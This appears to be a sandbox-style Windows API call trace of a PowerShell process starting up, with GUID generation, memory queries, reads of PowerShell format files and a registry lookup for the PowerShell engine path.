	[0349.089] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x8718138d, Data2=0x8307, Data3=0x4278, Data4=([0]=0x9e, [1]=0x52, [2]=0x42, [3]=0xc1, [4]=0x48, [5]=0x3f, [6]=0x7, [7]=0x47))) returned 0x0
	[0349.089] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x91b4365, Data2=0xe87, Data3=0x4497, Data4=([0]=0xbc, [1]=0xaa, [2]=0x4e, [3]=0xf5, [4]=0x26, [5]=0x89, [6]=0xb5, [7]=0x3e))) returned 0x0
	[0349.089] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x4a03fa97, Data2=0x3a5a, Data3=0x467f, Data4=([0]=0x98, [1]=0x59, [2]=0xac, [3]=0x22, [4]=0x3a, [5]=0x13, [6]=0x74, [7]=0x7a))) returned 0x0
	[0349.089] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x12900181, Data2=0xf020, Data3=0x434a, Data4=([0]=0xb1, [1]=0xe0, [2]=0x96, [3]=0x52, [4]=0x64, [5]=0x3f, [6]=0x47, [7]=0xf3))) returned 0x0
	[0349.090] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xa130059f, Data2=0x2f2b, Data3=0x4b9e, Data4=([0]=0x8c, [1]=0xa8, [2]=0xc3, [3]=0x10, [4]=0x5b, [5]=0xe2, [6]=0x50, [7]=0x42))) returned 0x0
	[0349.090] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xf4d967ff, Data2=0x36df, Data3=0x49a3, Data4=([0]=0xba, [1]=0x58, [2]=0x27, [3]=0xa9, [4]=0x5a, [5]=0xa8, [6]=0xda, [7]=0x59))) returned 0x0
	[0349.090] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xf9d3fd6c, Data2=0xf261, Data3=0x4e57, Data4=([0]=0xb0, [1]=0x5c, [2]=0x69, [3]=0x64, [4]=0x3, [5]=0xaf, [6]=0x58, [7]=0xfd))) returned 0x0
	[0349.090] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xe64f213d, Data2=0xd7e0, Data3=0x4a44, Data4=([0]=0xa1, [1]=0xee, [2]=0x2e, [3]=0xbb, [4]=0xb1, [5]=0x39, [6]=0xca, [7]=0xf6))) returned 0x0
	[0349.090] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.090] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.091] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.092] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x7d356556, Data2=0xdde9, Data3=0x4855, Data4=([0]=0xba, [1]=0x68, [2]=0x4e, [3]=0x83, [4]=0xb5, [5]=0xda, [6]=0x37, [7]=0x4a))) returned 0x0
	[0349.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0349.092] SetErrorMode (uMode=0x1) returned 0x1
	[0349.092] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0349.092] GetFileType (hFile=0x334) returned 0x1
	[0349.092] SetErrorMode (uMode=0x1) returned 0x1
	[0349.092] GetFileType (hFile=0x334) returned 0x1
	[0349.093] ReadFile (in: hFile=0x334, lpBuffer=0x341ba40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x341ba40*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.283] ReadFile (in: hFile=0x334, lpBuffer=0x341ba40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x341ba40*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.283] ReadFile (in: hFile=0x334, lpBuffer=0x341ba40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x341ba40*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.283] ReadFile (in: hFile=0x334, lpBuffer=0x341ba40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x341ba40*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.284] ReadFile (in: hFile=0x334, lpBuffer=0x341ba40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x341ba40*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.284] ReadFile (in: hFile=0x334, lpBuffer=0x341ba40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x341ba40*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.284] ReadFile (in: hFile=0x334, lpBuffer=0x341ba40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x341ba40*, lpNumberOfBytesRead=0xcd078*=0x119, lpOverlapped=0x0) returned 1
	[0349.285] ReadFile (in: hFile=0x334, lpBuffer=0x341ba40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x341ba40*, lpNumberOfBytesRead=0xcd078*=0x0, lpOverlapped=0x0) returned 1
	[0349.285] CloseHandle (hObject=0x334) returned 1
	[0349.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0349.285] SetErrorMode (uMode=0x1) returned 0x1
	[0349.285] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd020 | out: lpFileInformation=0xcd020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0349.285] SetErrorMode (uMode=0x1) returned 0x1
	[0349.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0349.285] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd108 | out: phkResult=0xcd108*=0x334) returned 0x0
	[0349.286] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd08c, lpData=0x0, lpcbData=0xcd088*=0x0 | out: lpType=0xcd08c*=0x1, lpData=0x0, lpcbData=0xcd088*=0x56) returned 0x0
	[0349.286] CoTaskMemAlloc (cb=0x5a) returned 0x37db50
	[0349.286] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd05c, lpData=0x37db50, lpcbData=0xcd058*=0x56 | out: lpType=0xcd05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd058*=0x56) returned 0x0
	[0349.286] CoTaskMemFree (pv=0x37db50) 
	[0349.286] RegCloseKey (hKey=0x334) returned 0x0
	[0349.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0349.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0349.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.288] VirtualQuery (in: lpAddress=0xcbba0, lpBuffer=0xcca60, dwLength=0x30 | out: lpBuffer=0xcca60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.289] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x8ad5a5d9, Data2=0xb8ca, Data3=0x4a62, Data4=([0]=0xb9, [1]=0x2f, [2]=0x8e, [3]=0x49, [4]=0x7c, [5]=0x5, [6]=0x7, [7]=0xc2))) returned 0x0
	[0349.289] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.289] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x610a57d4, Data2=0x7801, Data3=0x4968, Data4=([0]=0xa7, [1]=0x0, [2]=0xf2, [3]=0xa5, [4]=0x60, [5]=0x48, [6]=0x46, [7]=0x1a))) returned 0x0
	[0349.289] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x8cd4bdbc, Data2=0x37d6, Data3=0x448b, Data4=([0]=0xa1, [1]=0x45, [2]=0xeb, [3]=0x5e, [4]=0xbb, [5]=0xc7, [6]=0xba, [7]=0xa3))) returned 0x0
	[0349.289] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x6d6487fe, Data2=0x8a5e, Data3=0x4156, Data4=([0]=0xb4, [1]=0xd8, [2]=0x68, [3]=0xfd, [4]=0x44, [5]=0xa0, [6]=0xa5, [7]=0xc7))) returned 0x0
	[0349.289] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.290] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0349.290] SetErrorMode (uMode=0x1) returned 0x1
	[0349.290] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0349.290] GetFileType (hFile=0x334) returned 0x1
	[0349.290] SetErrorMode (uMode=0x1) returned 0x1
	[0349.290] GetFileType (hFile=0x334) returned 0x1
	[0349.291] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.292] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.292] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.292] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.293] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.293] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.293] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.294] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.294] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.295] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.295] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.295] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.295] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.295] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.296] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.296] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.297] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.297] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.297] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.298] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.298] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.298] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.298] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.299] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.299] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.299] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.299] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.299] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.300] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.300] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.300] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.300] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.303] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.303] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.303] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.303] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.304] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.304] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.304] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.304] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.305] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.305] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.305] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.305] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.305] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.305] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.305] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.306] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.306] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.306] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
